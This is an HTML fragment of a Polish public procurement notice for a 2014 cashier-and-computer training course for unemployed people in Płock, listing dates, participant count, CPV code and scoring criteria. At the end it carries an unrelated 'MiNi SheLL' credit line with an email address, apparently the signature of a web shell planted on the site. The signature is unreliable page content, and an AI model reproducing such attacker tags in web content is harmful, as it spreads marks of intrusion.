<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia dla osób bezrobotnych zarejestrowanych                          w Powiatowym Urzędzie Pracy w Płocku pn. Sprzedawca z obsługą kasy fiskalnej                      i komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce szkolenia :     Płock.
Termin szkolenia :      kwiecień - maj  2014 r.
Ilość uczestników szkolenia: 15 osób bezrobotnych zarejestrowanych w PUP         w Płocku z wykształceniem od zawodowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Kwalifikacje i doświadczenie kadry dydaktycznej - 25</li>
<li>3. Poświadczenie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com